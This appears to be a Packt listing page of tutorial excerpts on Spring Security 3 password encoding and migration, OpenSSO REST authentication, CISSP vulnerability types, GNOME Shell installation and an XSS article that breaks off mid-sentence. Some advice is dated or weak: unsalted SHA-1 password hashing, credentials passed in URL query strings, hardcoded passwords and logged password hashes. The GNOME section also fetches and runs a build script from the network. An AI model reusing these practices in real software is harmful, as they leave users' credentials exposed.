This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will:

- Examine different methods of configuring password encoding
- Understand the password salting technique of providing additional security to stored passwords

(For more resources on Spring, see here.)

In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way that makes it impractically difficult for malicious users to compromise them. The following general rules should be applied to passwords stored in a database:

- Passwords must not be stored in cleartext (plain text)
- Passwords supplied by the user must be compared to recorded passwords in the database
- A user's password should not be supplied to the user upon demand (even if the user forgets it)

For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords, as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users, with the added bonus that once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system.
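The one-way encode-and-compare scheme just described can be sketched in plain Java. SHA-256 and the simple salt-plus-password concatenation below are illustrative choices for the sketch, not the book's exact configuration (the chapter itself configures Spring Security's encoders):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// One-way password storage: keep hash(salt + password), never the
// cleartext. A login attempt is verified by re-hashing and comparing;
// the original password is never recovered from the stored value.
public class OneWayEncoder {
    public static String encode(String password, String salt) {
        try {
            MessageDigest md = MessageDigest.getInstance("SHA-256");
            byte[] digest = md.digest((salt + password).getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) hex.append(String.format("%02x", b));
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e); // SHA-256 is always available
        }
    }

    public static boolean matches(String attempt, String salt, String stored) {
        return encode(attempt, salt).equals(stored);
    }
}
```

Note how verification never decrypts anything: the attempt is pushed through the same one-way function and the two digests are compared.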
Storing other types of sensitive information

Many of the guidelines that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways; for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).

You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, or most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load to encrypt all the passwords in the database.

For password encryption to work properly, two actors must use password encryption in synchronization, ensuring that passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface.
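The PasswordEncoder contract just mentioned can be sketched as a small stand-in class. To my understanding the real Spring Security 3 interface declares encodePassword and isPasswordValid methods with roughly these shapes, but the class below is a simplified illustration mirroring PlaintextPasswordEncoder's behavior, not the actual framework code:

```java
// Simplified stand-in for Spring Security's PasswordEncoder contract:
// encode a raw password (optionally with a salt), and validate an
// attempt by encoding it and comparing with the stored encoded value.
// This variant performs no transformation, like PlaintextPasswordEncoder.
public class PlaintextEncoderSketch {
    public String encodePassword(String rawPass, Object salt) {
        return rawPass; // plaintext: stored form equals the raw password
    }

    public boolean isPasswordValid(String encPass, String rawPass, Object salt) {
        return encodePassword(rawPass, salt).equals(encPass);
    }
}
```

Swapping the body of encodePassword for a real digest is what the SHA-based implementations in the table below effectively do, while the validation logic stays the same.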
Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows:

```xml
<authentication-manager alias="authenticationManager">
  <authentication-provider user-service-ref="jdbcUserService">
    <password-encoder hash="sha"/>
  </authentication-provider>
</authentication-manager>
```

You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable for different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following table provides a list of the out of the box implementation classes and their benefits. Note that all implementations reside in the o.s.s.authentication.encoding package.

Implementation class | Description | hash value
PlaintextPasswordEncoder | Encodes the password as plaintext. Default DaoAuthenticationProvider password encoder. | plaintext
Md4PasswordEncoder | PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm; use of this encoder is not recommended. | md4
Md5PasswordEncoder | PasswordEncoder utilizing the MD5 one-way encoding algorithm. | md5
ShaPasswordEncoder | PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support configurable levels of encoding strength. | sha, sha-256
LdapShaPasswordEncoder | Implementation of LDAP SHA and LDAP SSHA algorithms used in integration with LDAP authentication stores. | {sha}, {ssha}

As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application.
Configuring password encoding

Configuring basic password encoding involves two pieces: encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder.

Configuring the PasswordEncoder

First, we'll declare an instance of a PasswordEncoder as a normal Spring bean:

```xml
<bean class="org.springframework.security.authentication.encoding.ShaPasswordEncoder"
      id="passwordEncoder"/>
```

You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage.

Configuring the AuthenticationProvider

We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step:

```xml
<authentication-manager alias="authenticationManager">
  <authentication-provider user-service-ref="jdbcUserService">
    <password-encoder ref="passwordEncoder"/>
  </authentication-provider>
</authentication-manager>
```

Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groups-data.sql script) are not stored in an encrypted form that matches the password encoder. We'll need to post-process the bootstrap data with some simple Java code.

Writing the database bootstrap password encoder

The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security.DatabasePasswordSecurerBean, is fairly simple.
```java
public class DatabasePasswordSecurerBean extends JdbcDaoSupport {
    @Autowired
    private PasswordEncoder passwordEncoder;

    public void secureDatabase() {
        getJdbcTemplate().query("select username, password from users",
            new RowCallbackHandler() {
                @Override
                public void processRow(ResultSet rs) throws SQLException {
                    String username = rs.getString(1);
                    String password = rs.getString(2);
                    String encodedPassword =
                        passwordEncoder.encodePassword(password, null);
                    getJdbcTemplate().update(
                        "update users set password = ? where username = ?",
                        encodedPassword, username);
                    logger.debug("Updating password for username: "
                        + username + " to: " + encodedPassword);
                }
            });
    }
}
```

The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode each password using the injected PasswordEncoder reference. Each password is updated individually.
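The same walk-and-re-encode idea can be demonstrated without Spring or a database, against an in-memory user store. This is a hypothetical analogue of the bean above, shown only to make its loop behavior concrete:

```java
import java.util.Map;
import java.util.function.UnaryOperator;

// In-memory analogue of DatabasePasswordSecurerBean: visit every user
// record and replace the cleartext password with its encoded form,
// using whatever encoder function is supplied.
public class BootstrapSecurer {
    public static void secure(Map<String, String> usersToPasswords,
                              UnaryOperator<String> encoder) {
        usersToPasswords.replaceAll((username, password) -> encoder.apply(password));
    }
}
```

The JdbcTemplate version does exactly this, one row at a time, with the update written back per user; here the map plays the role of the users table.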
Packt
21 May 2010
5 min read
Migration to Spring Security 3

(For more resources on Spring, see here.)

During the course of this article we will:

- Review important enhancements in Spring Security 3
- Understand configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3
- Illustrate the overall movement of important classes and packages in Spring Security 3

Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3.

Migrating from Spring Security 2

You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of your concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3, both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable).

A very important migration note is that Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security itself!

Enhancements in Spring Security 3

Significant enhancements in Spring Security 3 over Spring Security 2 include the following:

- The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications.
- Additional fine-grained configuration around authentication and access successes and failures.
- Enhanced capabilities of method access declaration, including annotation-based pre- and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior.
- Fine-grained management of session access and concurrency control using the security namespace.
- Noteworthy revisions to the ACL module, including the removal of the legacy ACL code in o.s.s.acl and fixes for some important issues in the ACL framework.
- Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID.
- New Kerberos and SAML single sign-on support through the Spring Security Extensions project.

Other more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage make much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection.

If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article.

Changes to configuration in Spring Security 3

Many of the changes in Spring Security 3 will be visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3.

Rearranged AuthenticationManager configuration

The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected: declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all.
```xml
<authentication-provider>
  <jdbc-user-service data-source-ref="dataSource"/>
</authentication-provider>
```

In Spring Security 2 it was possible to declare the <authentication-manager> element as a sibling of any AuthenticationProvider:

```xml
<authentication-manager alias="authManager"/>
<authentication-provider>
  <jdbc-user-service data-source-ref="dataSource"/>
</authentication-provider>
<ldap-authentication-provider server-ref="ldap://localhost:10389/"/>
```

In Spring Security 3, all AuthenticationProvider elements must be children of the <authentication-manager> element, so this would be rewritten as follows:

```xml
<authentication-manager alias="authManager">
  <authentication-provider>
    <jdbc-user-service data-source-ref="dataSource"/>
  </authentication-provider>
  <ldap-authentication-provider server-ref="ldap://localhost:10389/"/>
</authentication-manager>
```

Of course, this means that the <authentication-manager> element is now required in any security namespace configuration. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition:

```xml
<bean id="signedRequestAuthenticationProvider"
      class="com.packtpub.springsecurity.security.SignedUsernamePasswordAuthenticationProvider">
  <security:custom-authentication-provider/>
  <property name="userDetailsService" ref="userDetailsService"/>
  <!-- ... -->
</bean>
```

While moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows:

```xml
<authentication-manager alias="authenticationManager">
  <authentication-provider ref="signedRequestAuthenticationProvider"/>
</authentication-manager>
```

Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3; look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping.

New configuration syntax for session management options

In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows:

```xml
<http ... session-fixation-protection="none">
  <!-- ... -->
  <concurrent-session-control exception-if-maximum-exceeded="true" max-sessions="1"/>
</http>
```

The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element and consolidates as follows:

```xml
<http ...>
  <session-management session-fixation-protection="none">
    <concurrency-control error-if-maximum-exceeded="true" max-sessions="1"/>
  </session-management>
</http>
```

You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Packt
12 May 2010
Securing our Applications using OpenSSO in GlassFish Security

An example of such a system is the integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hands. All of these systems access some part of the data, which flows into the other software so that each can perform its job efficiently. All employees can benefit from a single sign-on solution, which frees them from having to authenticate themselves multiple times during the working day. Another example is a travel portal, whose clients need to communicate with many other systems to plan their travels. Integration between an in-house system and external partners can happen at different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible, and the need for some kind of integration mechanism becomes more and more pressing. SSO as a concept, and OpenSSO as a product, address this need to integrate systems' security. OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and auditing. These interfaces include the Client SDK for different programming languages, and support for standards including:

Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO)
XML Access Control Markup Language (XACML) for authorization functions
Service Provisioning Markup Language (SPML) for identity management functions

Using the client SDKs and the standards mentioned above is suitable when we are developing custom solutions or integrating our system with partners that are already using them in their security infrastructure.
For any other scenario these methods are overkill for developers. To make it easier for developers to interact with OpenSSO core services, the Identity Web Services (IWS) are provided. We discussed IWS briefly in the OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks shown in the following table:

Task: Authentication and single sign-on — Description: Verifying the user's credentials or authentication token.
Task: Authorization — Description: Checking the authenticated user's permissions for accessing a resource.
Task: Provisioning — Description: Creating, deleting, searching, and editing users.
Task: Logging — Description: The ability to audit and record operations.

IWS are exposed in two models: the first is the WS-* compliant, SOAP-based Web Services model, and the second is a very simple but elegant set of RESTful services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use the RESTful interface to perform authentication, authorization, and SSO.

Authenticating users by the RESTful interface

Performing authentication using the RESTful Web Services interface is very simple, as it is just like plain HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters, and the output is what we can expect from that operation. The URL for the authentication operation, along with its parameters, is as follows:

Operation: Authentication
Operation URL: http://host:port/OpenSSOContext/identity/authenticate
Parameters: username, password, uri
Output: subjectid

The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext, which are things we already know. After the context we have the path to the RESTful service we want to invoke.
The path includes the task type, which can be one of the tasks included in the IWS task list table, and the operation we want to invoke. All parameters are self-descriptive except uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or to the original resource which the user has requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation, such as authorization or logout. If you remember session IDs from your web development experience, subjectid plays the same role as a session ID. You can view all sessions, along with related information, from the OpenSSO administration console homepage under the Sessions tab. The following listing shows a sample JSP page which performs a RESTful call to OpenSSO to authenticate a user and obtain a session ID for the user if they get authenticated.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authenticate";
    String username = "james";
    String password = "james";
    username = java.net.URLEncoder.encode(username, "UTF-8");
    password = java.net.URLEncoder.encode(password, "UTF-8");
    String operationString = operationURL + "?username=" + username +
        "&password=" + password;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>Subject ID</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>

REST made straightforward tasks easier than ever.
Without using REST we would have had to deal with the complexity of SOAP, WSDL, and so on, but with REST you can understand the whole code on a first scan. Beginning from the top, we define the REST operation URL, which is assembled from the operation URL with the required parameters appended, using each parameter's name and value. The URL that we connect to will be something like:

http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james

After assembling the URL we open a network connection to perform the authentication. After opening the connection we can check whether we received an HTTP_OK response from the server or not. Receiving HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes, such as HTTP_UNAUTHORIZED (HTTP error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html.

Authorizing using REST

If you remember, in the Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police the http://gfbook.pcname.com:8080/ URL for us, and later on we applied the policy rule to a group of users that we created; now we want to check how our policy works. In every security system, an authentication process must complete with a positive result before any authorization process can begin. In our case the result of the authentication is the subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not.
The URL for the authorization operation, along with its parameters, is as follows:

Operation: Authorization
Operation URL: http://host:port/OpenSSOContext/identity/authorize
Parameters: uri, action, subjectid
Output: true or false, based on the subject's permission to perform the given action on the entity

The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, for permission to perform the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource or not. In the sample code we are checking james, identified by the subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier.

<%
try {
    String operationURL =
        "http://gfbook.pcname.com:8080/opensso/identity/authorize";
    String protectedUrl = "http://127.0.0.1:38080/Conversion-war/";
    String subjectId =
        "AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";
    String action = "POST";
    protectedUrl = java.net.URLEncoder.encode(protectedUrl, "UTF-8");
    subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");
    String operationString = operationURL + "?uri=" + protectedUrl +
        "&action=" + action + "&subjectid=" + subjectId;
    java.net.URL Operation = new java.net.URL(operationString);
    java.net.HttpURLConnection connection =
        (java.net.HttpURLConnection) Operation.openConnection();
    int responseCode = connection.getResponseCode();
    if (responseCode == java.net.HttpURLConnection.HTTP_OK) {
        java.io.BufferedReader reader = new java.io.BufferedReader(
            new java.io.InputStreamReader(
                (java.io.InputStream) connection.getContent()));
        out.println("<h2>authorization Result</h2>");
        String line = reader.readLine();
        out.println(line);
    }
} catch (Exception e) {
    e.printStackTrace();
}
%>

For this listing everything is the same as the authentication process in terms of initializing objects and
calling methods, except that in the beginning we define the protected URL string, then we include the subjectid, which is the result of our previous authentication. Later on we define the action whose permission we want to check for our authenticated user, and finally we read the result of the authorization. The complete operation URL, after including all parameters, is similar to the following snippet:

http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId

Note that no two subjectid values are ever the same, even for the same user on the same machine and the same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and use the subjectid resulting from your authentication in place of the subjectid we specified previously.
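Both listings above share the same URL-assembly step: append URL-encoded parameters to the operation URL. The following stand-alone helper is our own sketch of that step (the helper name and structure are ours; the OpenSSO endpoint path is taken from the article):

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical helper illustrating the URL-assembly step shared by the
// authentication and authorization listings.
public class RestUrlBuilder {

    public static String build(String operationUrl, Map<String, String> params) {
        StringBuilder sb = new StringBuilder(operationUrl);
        char sep = '?'; // first parameter uses '?', subsequent ones '&'
        for (Map.Entry<String, String> e : params.entrySet()) {
            try {
                sb.append(sep)
                  .append(URLEncoder.encode(e.getKey(), "UTF-8"))
                  .append('=')
                  .append(URLEncoder.encode(e.getValue(), "UTF-8"));
            } catch (UnsupportedEncodingException ex) {
                throw new IllegalStateException(ex); // UTF-8 is always available
            }
            sep = '&';
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        Map<String, String> p = new LinkedHashMap<>();
        p.put("username", "james");
        p.put("password", "james");
        System.out.println(build("http://gfbook.pcname.com:8080/opensso/identity/authenticate", p));
    }
}
```

URL-encoding the values matters in practice: a subjectid such as the one shown above contains `=` and `#` characters that would otherwise corrupt the query string.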
Packt
12 Mar 2010
CISSP: Vulnerability and Penetration Testing for Access Control

IT components such as operating systems, application software, and even networks have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility of penetration into the systems, which may result in unauthorized access and a compromise of the confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities, while penetration tests are conducted to check the following:

The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained
Whether the systems can be shut down or overloaded with malicious data, using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied

Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation.

Vulnerability assessment

Vulnerability assessment is a process in which IT systems such as computers and networks, and software such as operating systems and application software, are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as a variable or constant are not properly defined or checked. It can be exploited by supplying more data than the entity can hold. This results in memory spilling over into other areas, thereby corrupting the instructions or code that need to be processed by the microprocessor.
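The boundary check described above can be sketched in a few lines. Java enforces array bounds at runtime, so classic buffer overflows are not possible in pure Java; the snippet below (our own illustration, not from the book) only demonstrates the explicit length validation that unmanaged languages must perform before every copy:

```java
// Sketch of the boundary check whose absence causes buffer overflows.
public class BoundsCheckDemo {

    // Copy src into dst, refusing to write past dst's capacity.
    public static int safeCopy(byte[] dst, byte[] src) {
        int n = Math.min(dst.length, src.length); // the boundary check
        System.arraycopy(src, 0, dst, 0, n);
        return n; // number of bytes actually copied
    }

    public static void main(String[] args) {
        byte[] buffer = new byte[4];
        byte[] input = "AAAAAAAA".getBytes(); // 8 bytes: larger than the buffer
        System.out.println("copied " + safeCopy(buffer, input) + " of " + input.length);
    }
}
```

Without the Math.min clamp, a copy of the full input length would write past the end of the destination buffer, which is exactly the memory spill-over described above.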
When a vulnerability is exploited it results in a security violation, which in turn has a certain impact. A security violation may be unauthorized access, escalation of privileges, or denial of service to the IT systems. Tools called vulnerability scanners are used in the process of identifying vulnerabilities. A vulnerability scanning tool can be hardware-based or a software application. Generally, vulnerabilities can be classified based on the type of security error, a type being the root cause of the vulnerability. Vulnerabilities can be classified into the following types:

Access Control Vulnerabilities

An error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource.

Examples:
Improper or no access control list or table
No privilege model
Inadequate file permissions
Improper or weak encoding

Security violation and impact:
Files, objects, or processes can be accessed directly without authentication or routing.

Authentication Vulnerabilities

An error due to inadequate identification mechanisms, so that a user or a process is not correctly identified.

Examples:
Weak or static passwords
Improper or weak encoding, or weak algorithms

Security violation and impact:
An unauthorized or less privileged user (for example, a Guest user), or a less privileged process, gains higher privileges, such as administrative or root access to the system

Boundary Condition Vulnerabilities

An error due to inadequate checking and validating mechanisms, such that the length of data is not checked or validated against the size of the data storage or resource.

Examples:
Buffer overflow
Overwriting the original data in the memory

Security violation and impact:
Memory is overwritten with some arbitrary code so that it gains access to programs or corrupts the memory. This will ultimately crash the operating system.
An unstable system due to memory corruption may be exploited to get command prompt, or shell, access by injecting arbitrary code

Configuration Weakness Vulnerabilities

An error due to the improper configuration of system parameters, or leaving the default configuration settings as is, which may not be secure.

Examples:
Default security policy configuration
File and print access in Internet connection sharing

Security violation and impact:
Most of the default configuration settings of many software applications are published and available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges, resulting in privilege escalation.

Exception Handling Vulnerabilities

An error due to improper setup or coding, where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions.

Example:
SQL injection

Security violation and impact:
By injecting exceptional data, user credentials can be captured by an unauthorized entity

Input Validation Vulnerabilities

An error due to a lack of verification mechanisms to validate the input data or contents.

Examples:
Directory traversal
Malformed URLs

Security violation and impact:
Due to poor input validation, access to system-privileged programs may be obtained.

Randomization Vulnerabilities

An error due to weak or insufficient randomness in data used by the process. These vulnerabilities predominantly relate to encryption algorithms.

Examples:
Weak encryption key
Insufficient random data

Security violation and impact:
The cryptographic key can be compromised, which will impact data and access security.

Resource Vulnerabilities

An error due to a lack of resource availability for correct operations or processes.
Examples:
Memory getting full
CPU completely utilized

Security violation and impact:
Due to the lack of resources the system becomes unstable or hangs. This results in a denial of service to legitimate users.

State Errors

An error resulting from a lack of state maintenance due to incorrect process flows.

Example:
Opening multiple tabs in web browsers

Security violation and impact:
There are specific security attacks, such as cross-site scripting (XSS), that can result in user-authenticated sessions being hijacked.

Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost-effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by application vendors and hardening the systems.
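The SQL injection example in the list above can be made concrete with a short sketch. The code below (our own illustration; the table and column names are hypothetical) builds a query by naive string concatenation and shows how crafted input rewrites its meaning. Nothing is executed against a database; we only inspect the resulting string:

```java
// Demonstration of SQL injection via naive string concatenation.
public class SqlInjectionDemo {

    // Vulnerable: user input is spliced directly into the SQL text.
    public static String naiveQuery(String user, String pass) {
        return "SELECT * FROM users WHERE name='" + user + "' AND pass='" + pass + "'";
    }

    public static void main(String[] args) {
        String attack = naiveQuery("admin", "x' OR '1'='1");
        System.out.println(attack);
        // The WHERE clause now always evaluates to true:
        //   SELECT * FROM users WHERE name='admin' AND pass='x' OR '1'='1'
        //
        // The standard countermeasure is a parameterized query, e.g. with JDBC
        // (shown as a comment only, since it needs a live database connection):
        //   PreparedStatement ps = conn.prepareStatement(
        //       "SELECT * FROM users WHERE name=? AND pass=?");
        //   ps.setString(1, user); ps.setString(2, pass);
    }
}
```

Parameterized queries keep the exceptional data out of the SQL grammar entirely, which is why they are the usual countermeasure for this vulnerability class.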
Packt
18 Jan 2010
Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Remember, these are development builds and preview snapshots, and are still in the early stages. While it appears to be functional (so far), your mileage may vary.

Installing GNOME-Shell

With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot, so you are not running the latest-greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox.

Package Installation

If you'd prefer to install the package and just take a sneak-peek at the snapshot, simply run the command below in your terminal:

sudo aptitude install gnome-shell

Manual Compilation

Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems, please note that installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell

There is one package that you'll need to compile GNOME Shell called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven't noticed any problems in doing so. To install jhbuild from the 9.04 repository use the instructions below:

1. Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download
2. Select a mirror close to you
3. Download / install the .deb package.
I don't believe there are any additional dependencies needed for this package. After that package is installed you'll want to download a GNOME Shell build setup script, which makes this entire process much, much simpler:

cd ~
wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh

This script will handle finding and installing dependencies as well as compiling the builds, etc. To launch this script, run the command:

gnome-shell-build-setup.sh

You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it reports no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0GHz Dell laptop. My build was completely automated but, considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command:

jhbuild build

Ready To Launch

Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below. Please take note of the method, depending on how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearance and disable it under the Desktop Effects tab.

Package Installation

Launch with:

gnome-shell --replace

Manual Compilation

Launch it as follows:

~/gnome-shell/source/gnome-shell/src/gnome-shell --replace
Packt
01 Dec 2009
Blocking Common Attacks using ModSecurity 2.5: Part 2

Cross-site scripting

Cross-site scripting attacks occur when user input is not properly sanitized and ends up in pages sent back to users. This makes it possible for an attacker to include malicious scripts in a page by providing them as input to the page. The scripts will be no different from scripts included in pages by the website creators, and will thus have all the privileges of an ordinary script within the page—such as the ability to read cookie data and session IDs. In this article we will look in more detail at how to prevent these attacks. The name "cross-site scripting" is actually rather poorly chosen—the name stems from the first such vulnerability that was discovered, which involved a malicious website using HTML framesets to load an external site inside a frame. The malicious site could then manipulate the loaded external site in various ways—for example, read form data, modify the site, and basically perform any scripting action that a script within the site itself could perform. Thus cross-site scripting, or XSS, was the name given to this kind of attack. The attacks described as XSS attacks have since shifted from malicious frame injection (a problem that was quickly patched by web browser developers) to the class of attacks that we see today involving unsanitized user input. The vulnerability referred to today might be better described as a "malicious script injection attack", though that doesn't give it quite as flashy an acronym as XSS. (And in case you're curious why the acronym is XSS and not CSS, the simple explanation is that although CSS was used as short for cross-site scripting in the beginning, it was changed to XSS because so many people were confusing it with the acronym used for Cascading Style Sheets, which is also CSS.) Cross-site scripting attacks can lead not only to cookie and session data being stolen, but also to malware being 